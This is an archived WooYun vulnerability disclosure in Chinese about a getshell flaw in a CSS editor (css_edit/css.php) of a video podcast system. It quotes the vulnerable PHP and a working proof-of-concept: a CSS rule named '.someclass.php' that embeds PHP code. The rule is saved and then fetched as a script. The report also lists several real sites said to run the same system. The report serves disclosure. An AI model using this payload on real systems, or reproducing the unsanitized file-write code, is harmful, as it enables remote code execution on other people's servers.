乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-01-06: 细节已通知厂商并且等待厂商处理中 2014-01-11: 厂商已经确认,细节仅向厂商公开 2014-01-14: 细节向第三方安全合作伙伴开放 2014-03-07: 细节向核心白帽子及相关领域专家公开 2014-03-17: 细节向普通白帽子公开 2014-03-27: 细节向实习白帽子公开 2014-04-06: 细节向公众公开
听说提交通用型漏洞有奖励,提交一个去年发现的漏洞吧
北京尙为视讯科技有限公司播客系统看界面像是joomla的二次开发,在去年接到对某系统的授权测试时发现了此getshell漏洞,漏洞文件为http://www.shinyv.com/css_edit/css.phpcss编辑器,
这个css编辑器未对传入的数据做到很好的过滤,形成了getshellcss.php文件第1370-1375行
<form action="<?php echo $_SERVER['PHP_SELF']?>" method="POST" name="formAdmin"> <TEXTAREA id=output style="BORDER-RIGHT: gray 1px solid; BORDER-TOP: gray 1px solid; MARGIN: px; BORDER-LEFT: gray 1px solid; WIDTH: 220px; BORDER-BOTTOM: gray 1px solid" name=textarea rows=7> </TEXTAREA> <br> <input type="submit" value="保存代码" name="submit" > </form>
上传,然后第1398-1460行
<?php $textarea = $_POST['textarea']; $css_name = 'template_css.css'; $fp = fopen($css_name,'a+'); $css_back = file_get_contents($css_name); $start = strpos($textarea,"."); $end = strpos($textarea,"{"); $start = $start+1; $end = $end - 1;; $css_name = substr($textarea,$start,$end); // echo $css_name; $nums = strpos($css_back,$css_name); echo $nums; if ($nums == ""){ file_put_contents($css_name,$textarea); } $content = file_get_contents($css_name,$textarea); echo $content; /* $num = strlen($css_name); // echo $num; $num_start = strpos($css_back,$css_name); // echo $num_start; $num_end = strpos($css_back,"}",$num_start); // echo $num_end; $num_start = $num_start -1 ; $num_end = $num_end +1; $str_back = substr($css_back,$num_start,$num_end); // echo $str_back; $new_css = substr_replace($css_back,$textarea,$num_start,$num_end); // echo $new_css; // fwrite($fp,$new_css); // $fp = fopen($css_name,'w+'); $content = file_get_contents($css_name); echo $content; // file_put_contents($css_name,$new_css); //$content = file_get_contents($css_name); //echo $content; /* echo $text_area; echo $num; echo $re_str; /* $str1 = "qqqqq"; $srt = "qqq{} aaaa{rewqrewqrewq} aaa{}"; $str = "aaaa"; $qqq = substr($srt,7,19); echo $qqq; str_replace($qqq,$str) //echo strpos($srt,"}",5); //echo strlen($str); //echo strpos($srt,$str); $str = "abcdef"; $strt = substr_replace($str,"aa",0,1); echo $strt; */ ?>
这样,提交
.someclass.php{ color : #C7FF38; background-color : #E89100; border-width : 1px; <?php phpinfo()?> border-top-width : 1px; border-left-width : 11px; border-bottom-width : 1px; border-color : transparent;}
保存代码 访问http://www.shinyv.com/css_edit/someclass.php
这个系统用的人还挺多的http://tv.tianjinwe.com/css_edit/css.phphttp://www.woshitv.com/css_edit/css.phphttp://audio.cnr.cn/css_edit/css.php 等等等等。。。。。
将没用的文件删除
危害等级:高
漏洞Rank:17
确认时间:2014-01-11 10:08
暂无